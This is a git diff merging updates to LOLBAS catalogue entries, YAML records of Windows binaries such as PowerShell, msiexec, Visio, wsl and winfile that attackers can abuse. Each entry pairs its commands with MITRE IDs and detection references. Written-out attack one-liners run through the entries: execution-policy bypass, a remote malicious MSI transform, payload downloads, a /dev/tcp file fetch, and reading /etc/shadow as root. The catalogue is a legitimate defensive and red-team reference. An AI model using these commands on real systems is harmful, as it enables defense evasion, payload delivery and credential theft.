Merge branch 'LOLBAS-Project:master' into XBootMgrSleep

yml/HonorableMentions/PowerShell.yml

@@ -0,0 +1,38 @@
+---
+Name: Powershell.exe
+Description: Powershell.exe is a a task-based command-line shell built on .NET.
+Author: 'Everyone'
+Created: 2024-04-03
+Commands:
+  - Command: powershell.exe -ep bypass -file c:\path\to\a\script.ps1
+    Description: Set the execution policy to bypass and execute a PowerShell script without warning
+    Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires
+    Category: Execute
+    Privileges: User
+    MitreID: T1059.001
+    OperatingSystem: Windows 7 and up
+  - Command: powershell.exe -ep bypass -command "Invoke-AllTheThings..."
+    Description: Set the execution policy to bypass and execute a PowerShell command
+    Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires
+    Category: Execute
+    Privileges: User
+    MitreID: T1059.001
+    OperatingSystem: Windows 7 and up
+  - Command: powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA==
+    Description: Set the execution policy to bypass and execute a very malicious PowerShell encoded command
+    Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires
+    Category: Execute
+    Privileges: User
+    MitreID: T1059.001
+    OperatingSystem: Windows 7 and up
+Full_Path:
+  - Path: '%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe'
+  - Path: '%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/tree/71ae004b32bb3c7fb04714f8a051fc8e5edda68c/rules/windows/powershell
+Resources:
+  - Link: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1
+  - Link: https://attack.mitre.org/techniques/T1059/001/
+Acknowledgement:
+  - Person: Everyone
+    Handle: '@alltheoffensivecyberers'

yml/OSBinaries/Csc.yml

@@ -1,18 +1,18 @@
 ---
 Name: Csc.exe
-Description: Binary file used by .NET to compile C# code
+Description: Binary file used by .NET Framework to compile C# code
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
-  - Command: csc.exe -out:My.exe File.cs
-    Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
+  - Command: csc.exe -out:Output.exe File.cs
+    Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe.
     Usecase: Compile attacker code on system. Bypass defensive counter measures.
     Category: Compile
     Privileges: User
     MitreID: T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
   - Command: csc -target:library File.cs
-    Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
+    Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file.
     Usecase: Compile attacker code on system. Bypass defensive counter measures.
     Category: Compile
     Privileges: User
@@ -30,7 +30,4 @@ Detection:
   - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
   - IOC: Csc.exe should normally not run as System account unless it is used for development.
 Resources:
-  - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
-Acknowledgement:
-  - Person:
-    Handle:
+  - Link: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/

yml/OSBinaries/Msiexec.yml

@@ -19,7 +19,7 @@ Commands:
     MitreID: T1218.007
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
   - Command: msiexec /y "C:\folder\evil.dll"
-    Description: Calls DLLRegisterServer to register the target DLL.
+    Description: Calls DllRegisterServer to register the target DLL.
     Usecase: Execute dll files
     Category: Execute
     Privileges: User
@@ -28,7 +28,7 @@ Commands:
     Tags:
       - Execute: DLL
   - Command: msiexec /z "C:\folder\evil.dll"
-    Description: Calls DLLUnregisterServer to un-register the target DLL.
+    Description: Calls DllUnregisterServer to un-register the target DLL.
     Usecase: Execute dll files
     Category: Execute
     Privileges: User
@@ -37,12 +37,12 @@ Commands:
     Tags:
       - Execute: DLL
   - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
-    Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
-    Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
+    Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
+    Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
     Category: Execute
     Privileges: User
     MitreID: T1218.007
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\msiexec.exe
   - Path: C:\Windows\SysWOW64\msiexec.exe

yml/OSBinaries/Winget.yml

@@ -8,7 +8,7 @@ Commands:
     Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"'
     Usecase: Download and execute an arbitrary file from the internet
     Category: Execute
-    Privileges: Local Aministrator - required to enabled local manifest setting
+    Privileges: Local Administrator - required to enable local manifest setting
     MitreID: T1105
     OperatingSystem: Windows 10, Windows 11
 Full_Path:

yml/OtherMSBinaries/Visio.yml

@@ -0,0 +1,34 @@
+---
+Name: Visio.exe
+Description: Microsoft Visio Executable
+Author: Avihay Eldad
+Created: 2024-02-15
+Commands:
+  - Command: Visio.exe https://example.com/payload
+    Description: Downloads payload from remote server
+    Usecase: It will download a remote payload and place it in INetCache.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows
+    Tags:
+      - Download: INetCache
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe
+  - Path: C:\Program Files\Microsoft Office\Office14\Visio.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe
+  - Path: C:\Program Files\Microsoft Office\Office15\Visio.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe
+  - Path: C:\Program Files\Microsoft Office\Office16\Visio.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe
+  - Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe
+  - Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe
+  - Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe
+Detection:
+  - IOC: URL on a visio.exe command line
+  - IOC: visio.exe making unexpected network connections or DNS requests
+Acknowledgement:
+  - Person: Avihay Eldad
+    Handle: '@AvihayEldad'

yml/OtherMSBinaries/Wsl.yml

@@ -10,35 +10,28 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
   - Command: wsl.exe -u root -e cat /etc/shadow
     Description: Cats /etc/shadow file as root
     Usecase: Performs execution of arbitrary Linux commands as root without need for password.
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
-  - Command: wsl.exe --exec bash -c 'cat file'
-    Description: Cats /etc/shadow file as root
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
+  - Command: wsl.exe --exec bash -c "<command>"
+    Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
     Usecase: Performs execution of arbitrary Linux commands.
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
-  - Command: wsl.exe --system calc.exe
-    Description: Execute the command as root
-    Usecase: Performs execution of arbitrary Linux commands as root without need for password.
-    Category: Execute
-    Privileges: User
-    MitreID: T1202
-    OperatingSystem: Windows 11
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
   - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
     Description: Downloads file from 192.168.1.10
     Usecase: Download file
     Category: Download
     Privileges: User
-    MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\wsl.exe
 Code_Sample:
@@ -59,3 +52,4 @@ Acknowledgement:
     Handle: '@d1r4c'
   - Person: Nasreddine Bencherchali
     Handle: '@nas_bench'
+  - Person: Konrad 'unrooted' Klawikowski

yml/OtherMSBinaries/winfile.yml

@@ -0,0 +1,24 @@
+---
+Name: winfile.exe
+Description: Windows File Manager executable
+Author: Avihay Eldad
+Created: 2024-04-30
+Commands:
+  - Command: winfile.exe calc.exe
+    Description: Execute an executable file with WinFile as a parent process.
+    Usecase: Performs execution of specified file, can be used as a defense evasion
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Windows\System32\winfile.exe
+  - Path: C:\Windows\winfile.exe
+  - Path: C:\Program Files\WinFile\winfile.exe
+  - Path: C:\Program Files (x86)\WinFile\winfile.exe
+  - Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe
+Resources:
+  - Link: https://github.com/microsoft/winfile
+Acknowledgement:
+  - Person: Avihay Eldad
+    Handle: '@AvihayEldad'